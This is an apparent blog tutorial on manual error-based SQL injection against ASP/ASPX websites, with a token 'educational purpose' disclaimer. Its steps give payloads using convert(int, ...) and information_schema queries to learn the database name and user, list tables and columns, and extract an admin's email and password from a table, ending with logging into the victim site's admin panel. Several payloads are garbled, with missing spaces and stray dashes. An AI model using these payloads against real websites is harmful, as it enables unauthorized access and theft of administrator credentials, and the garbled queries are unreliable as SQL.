Recents in Beach

ASP/ASPX Injection (Manual)

NOTE: Hacking is a illegal activity so don't try on anyone. this tutorial is Only for educational purpose. If you want to use this tutorial for miscellaneous purpose please stop reading.
ASPX Injection is also similar to PHP based SQL Injection. But here, we don’t use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors.

Step 1: Finding Vulnerable Website:
find the Vulnerable websites like this

Step 2: Checking the Vulnerability:
To check the error just type at the end of the vulnerable URL EDIT
ASPX Injection
Step 3: To check that whether the site is vulnerable or not just type “having 1=1--at the end of the URL.
apsx injection

In asp/aspx based injections, we need not find out the number of columns or the most vulnerable column. We will directly find out the table names, column names and then we will extract the data.

Step 4: Finding Version just type same below link. and

aspx injection 
Step 5: To know the DATABASE NAME. and
1=convert(int, db_name())--

aspx injection

Step 6: Finding Username. and
1=convert(int, user_name())--

aaspx injection

Step 7: Finding Table Names. and
1=convert(int,(select top 1 table_name frominformation_schema.tables))—
aspx injection

But this may not be the desired table for us. So we need to find out the next table name in the database.

Step 8: Finding 2ndTable Names. and1=convert(int,(select top1 table_name from information_schema.tables where table_name notin('pp_category')))--

aspx injection

FINDING OUT THE COLUMNS Now we got the admin table
named as “pp_admin_tb”. So we need to find out the columns now.

Step 9: Finding Column Name. 
1=convert(int, (select top1column_name from information_schema. columns wheretable_name='pp_admin_tb'))--

aspx injection

If the first column is not related to our desired column names, then try to find next column name by the same method as we get table name.

Step 10: Finding Column Name Fields. and
1=convert (int,(select top1column_name from information_schema.columns wheretable_name='pp_admin_tb’and column_name not in('adminsign_id')))--

aspx injection

Step 11: Finding Next Column Name Fields. and1=convert(int,(select  top1column_name from information_schema.columns wheretable _name='pp_admin_tb’and column_name not in('adminsign_id','email_id' )))--

aspx injection EXTRACTING THE DATA After finding out all the columns,
we need to extract the data such as user names and passwords.

Step 12: Extracting the Username information. and1=convert(int, (select top1email_id from pp_admin_tb))—

Step 13: Extracting the Password information. (int, (select top1password from pp_admin_tb))—

Step 14: Now you known username & password  so go admin panel on a website and login .

Legal Disclaimer : This tutorial is completely for educational purpose only. For any misuse of this tutorial by any means the author will not be held responsible.  

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